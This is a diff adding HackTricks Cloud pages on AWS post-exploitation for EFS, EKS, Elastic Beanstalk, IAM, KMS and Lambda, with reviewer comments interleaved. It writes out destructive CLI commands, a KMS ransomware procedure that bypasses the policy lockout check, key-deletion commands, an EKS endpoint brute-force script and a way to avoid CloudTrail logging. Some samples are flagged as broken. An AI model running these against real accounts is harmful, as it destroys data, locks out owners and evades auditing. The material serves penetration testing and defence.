+{% endhint %} + +## EFS + +For more information check: + +{% content-ref url="../aws-services/aws-efs-enum.md" %} +[aws-efs-enum.md](../aws-services/aws-efs-enum.md) +{% endcontent-ref %} + +### `elasticfilesystem:DeleteMountTarget` + +An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. + +```sql +aws efs delete-mount-target --mount-target-id +``` + +**Potential Impact**: Disruption of file system access and potential data loss for users or applications. + +### `elasticfilesystem:DeleteFileSystem` + +An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. + +```perl +aws efs delete-file-system --file-system-id +``` + +**Potential Impact**: Data loss and service disruption for applications using the deleted file system. + +### `elasticfilesystem:UpdateFileSystem` + +An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. + +```sql +aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps +``` + +**Potential Impact**: Degradation of file system performance or resource exhaustion. + +### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` + +An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. + +```arduino +aws efs create-access-point --file-system-id --posix-user --root-directory +aws efs delete-access-point --access-point-id +``` + +**Potential Impact**: Unauthorized access to the file system, data exposure or modification. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
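Review bot: in aws-efs-post-exploitation.md, the `elasticfilesystem:UpdateFileSystem` example `aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps` only succeeds on a file system that is already in provisioned throughput mode; otherwise it also needs `--throughput-mode provisioned`, and the text should say that switching modes is part of what this permission allows. For `CreateAccessPoint`, creating an access point (for example with `--posix-user Uid=0,Gid=0`) does not by itself read any data: the attacker still needs a network path to a mount target and, when the file system policy requires IAM, `elasticfilesystem:ClientMount` / `elasticfilesystem:ClientWrite`; state those prerequisites next to the "Unauthorized access" impact line. Style: the four code fences are tagged `sql`, `perl`, `sql` and `arduino` although they contain shell commands; tag them `bash` like the rest of the series.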
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md new file mode 100644 index 0000000000..3421ae7cc7 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md @@ -0,0 +1,186 @@ +# AWS - EKS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EKS + +For mor information check + +{% content-ref url="../aws-services/aws-eks-enum.md" %} +[aws-eks-enum.md](../aws-services/aws-eks-enum.md) +{% endcontent-ref %} + +### Enumerate the cluster from the AWS Console + +If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)). + +### Connect to AWS Kubernetes Cluster + +* Easy way: + +```bash +# Generate kubeconfig +aws eks update-kubeconfig --name aws-eks-dev +``` + +* Not that easy way: + +If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. + +In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. 
You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): + +{% code overflow="wrap" %} +```bash +API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com + +/etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false +``` +{% endcode %} + +
+ +kube config + +```yaml +describe-cache-parametersapiVersion: v1 +clusters: +- cluster: + certificate-authority-data: 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 + server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com + name: arn:aws:eks:us-east-1::cluster/ +contexts: +- context: + cluster: arn:aws:eks:us-east-1::cluster/ + user: arn:aws:eks:us-east-1::cluster/ + name: arn:aws:eks:us-east-1::cluster/ +current-context: arn:aws:eks:us-east-1::cluster/ +kind: Config +preferences: {} +users: +- name: arn:aws:eks:us-east-1::cluster/ + user: + exec: + apiVersion: client.authentication.k8s.io/v1beta1 + args: + - --region + - us-west-2 + - --profile + - + - eks + - get-token + - --cluster-name + - + command: aws + env: null + interactiveMode: IfAvailable + provideClusterInfo: false +``` + +
+ +### From AWS to Kubernetes + +The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**. + +The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. + +{% hint style="warning" %} +Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. +{% endhint %} + +For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). + +Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**. + +### From Kubernetes to AWS + +It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1). + +### GET Api Server Endpoint from a JWT Token + +Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is + +```bash +https://...eks.amazonaws.com +``` + +Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: + +* gr7 +* yl4 + +Anyway are just 3 chars we can bruteforce them. 
Use the below script for generating the list + +```python +from itertools import product +from string import ascii_lowercase + +letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2) +number_combinations = product('0123456789', repeat = 1) + +result = [ + f'{''.join(comb[0])}{comb[1][0]}' + for comb in product(letter_combinations, number_combinations) +] + +with open('out.txt', 'w') as f: + f.write('\n'.join(result)) +``` + +Then with wfuzz + +```bash +wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com +``` + +{% hint style="warning" %} +Remember to replace & . +{% endhint %} + +### Bypass CloudTrail + +If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally). + +So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**. + +Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled). + +### EKS Ransom? + +By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster. + +So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. + +{% hint style="success" %} +Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. + +Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. 
+{% endhint %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
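Review bot: in aws-eks-post-exploitation.md, the endpoint brute-force script under "GET Api Server Endpoint from a JWT Token" does not run on Python older than 3.12: `f'{''.join(comb[0])}{comb[1][0]}'` reuses the single quote inside a single-quoted f-string, which is a SyntaxError before PEP 701; build the string as `''.join(comb[0]) + comb[1][0]` outside the f-string, and either drop the unused `ascii_lowercase` import or use it instead of the literal alphabet. The "kube config" block starts with `describe-cache-parametersapiVersion: v1`, a pasted fragment glued in front of `apiVersion: v1`, and the example mixes regions: the cluster ARNs say `us-east-1` while `server:` and the `--region` argument say `us-west-2`, and the userData sample above it has a `us-east-1` API URL with `us-west-2b` node-group labels; pick one region so readers do not copy an inconsistent config. Wording: "For mor information" → "For more information", and in the closing hint "you could EC2 nodes or move everything to EC2 to the cluster" is missing its verb ("you could add EC2 nodes to the cluster").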
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md new file mode 100644 index 0000000000..4856870bc6 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md @@ -0,0 +1,121 @@ +# AWS - Elastic Beanstalk Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Elastic Beanstalk + +For more information: + +{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} +[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) +{% endcontent-ref %} + +### `elasticbeanstalk:DeleteApplicationVersion` + +{% hint style="info" %} +TODO: Test if more permissions are required for this +{% endhint %} + +An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version +``` +{% endcode %} + +**Potential Impact**: Disruption of application deployment and potential loss of application versions. + +### `elasticbeanstalk:TerminateEnvironment` + +{% hint style="info" %} +TODO: Test if more permissions are required for this +{% endhint %} + +An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk terminate-environment --environment-name my-existing-env +``` +{% endcode %} + +**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. + +### `elasticbeanstalk:DeleteApplication` + +{% hint style="info" %} +TODO: Test if more permissions are required for this +{% endhint %} + +An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. 
+ +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force +``` +{% endcode %} + +**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. + +### `elasticbeanstalk:SwapEnvironmentCNAMEs` + +{% hint style="info" %} +TODO: Test if more permissions are required for this +{% endhint %} + +An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 +``` +{% endcode %} + +**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. + +### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` + +{% hint style="info" %} +TODO: Test if more permissions are required for this +{% endhint %} + +An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 + +aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag +``` +{% endcode %} + +**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
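Review bot: in aws-elastic-beanstalk-post-exploitation.md every section ships with an unresolved `TODO: Test if more permissions are required for this` hint; resolve these (run each command with only the named permission) or remove them before merging, because five identical TODO hints tell the reader nothing about which commands were actually verified. The `elasticbeanstalk:AddTags` / `elasticbeanstalk:RemoveTags` impact ("incorrect resource allocation, billing, or resource management") misses the security angle: when IAM policies scope Beanstalk actions with `aws:ResourceTag` conditions, adding or removing a tag changes who is allowed to act on the environment, and that is the consequence worth stating in the impact line.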
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md new file mode 100644 index 0000000000..7a73ed2bd1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -0,0 +1,130 @@ +# AWS - IAM Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## IAM + +For more information about IAM access: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +## Confused Deputy Problem + +If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. + +Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. + +
+ +However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. + +Example: + +```json +{ + "Version": "2012-10-17", + "Statement": { + "Effect": "Allow", + "Principal": { + "AWS": "Example Corp's AWS Account ID" + }, + "Action": "sts:AssumeRole", + "Condition": { + "StringEquals": { + "sts:ExternalId": "12345" + } + } + } +} +``` + +{% hint style="warning" %} +For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. +{% endhint %} + +### Unexpected Trusts + +#### Wildcard as principal + +```json +{ + "Action": "sts:AssumeRole", + "Effect": "Allow", + "Principal": { "AWS": "*" }, +} +``` + +This policy **allows all AWS** to assume the role. + +#### Service as principal + +```json +{ + "Action": "lambda:InvokeFunction", + "Effect": "Allow", + "Principal": { "Service": "apigateway.amazonaws.com" }, + "Resource": "arn:aws:lambda:000000000000:function:foo" +} +``` + +This policy **allows any account** to configure their apigateway to call this Lambda. + +#### S3 as principal + +```json +"Condition": { +"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, + "StringEquals": { + "aws:SourceAccount": "123456789012" + } +} +``` + +If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. 
+ +#### Not supported + +```json +{ + "Effect": "Allow", + "Principal": {"Service": "cloudtrail.amazonaws.com"}, + "Action": "s3:PutObject", + "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +} +``` + +A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). + +## References + +* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md new file mode 100644 index 0000000000..18859e4f37 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md @@ -0,0 +1,163 @@ +# AWS - KMS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## KMS + +For more information check: + +{% content-ref url="../aws-services/aws-kms-enum.md" %} +[aws-kms-enum.md](../aws-services/aws-kms-enum.md) +{% endcontent-ref %} + +### Encrypt/Decrypt information + +`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: + +* `fileb://:` Reads the file in binary mode, commonly used for non-text files. +* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. + +{% hint style="success" %} +Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) +{% endhint %} + +* Using a **symmetric** key + +```bash +# Encrypt data +aws kms encrypt \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +* Using a **asymmetric** key: + +```bash +# Encrypt data +aws kms encrypt \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --plaintext fileb:///tmp/hello.txt \ + --output text \ + --query CiphertextBlob | base64 \ + --decode > ExampleEncryptedFile + +# Decrypt data +aws kms decrypt \ + --ciphertext-blob fileb://ExampleEncryptedFile \ + --encryption-algorithm RSAES_OAEP_SHA_256 \ + --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ + --output text \ + --query Plaintext | base64 \ + --decode +``` + +### KMS Ransomware + +An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. 
+ +Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. + +{% hint style="warning" %} +Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. + +Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). +{% endhint %} + +```bash +# Force policy change +aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ + --policy-name default \ + --policy file:///tmp/policy.yaml \ + --bypass-policy-lockout-safety-check + +{ + "Id": "key-consolepolicy-3", + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "kms:*", + "Resource": "*" + } + ] +} +``` + +{% hint style="danger" %} +Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. +{% endhint %} + +
+ +### Generic KMS Ransomware + +#### Global KMS Ransomware + +There is another way to perform a global KMS Ransomware, which would involve the following steps: + +* Create a new **key with a key material** imported by the attacker +* **Re-encrypt older data** encrypted with the previous version with the new one. +* **Delete the KMS key** +* Now only the attacker, who has the original key material could be able to decrypt the encrypted data + +### Destroy keys + +```bash +# Destoy they key material previously imported making the key useless +aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab + +# Schedule the destoy of a key (min wait time is 7 days) +aws kms schedule-key-deletion \ + --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ + --pending-window-in-days 7 +``` + +{% hint style="danger" %} +Note that AWS now **prevents the previous actions from being performed from a cross account:** +{% endhint %} + +
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md new file mode 100644 index 0000000000..f7bea8e862 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -0,0 +1,55 @@ +# AWS - Lambda Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda + +For more information check: + +{% content-ref url="../../aws-services/aws-lambda-enum.md" %} +[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) +{% endcontent-ref %} + +### Steal Others Lambda URL Requests + +If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. + +{% content-ref url="aws-warm-lambda-persistence.md" %} +[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md) +{% endcontent-ref %} + +### Steal Others Lambda URL Requests & Extensions Requests + +Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. + +{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %} +[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
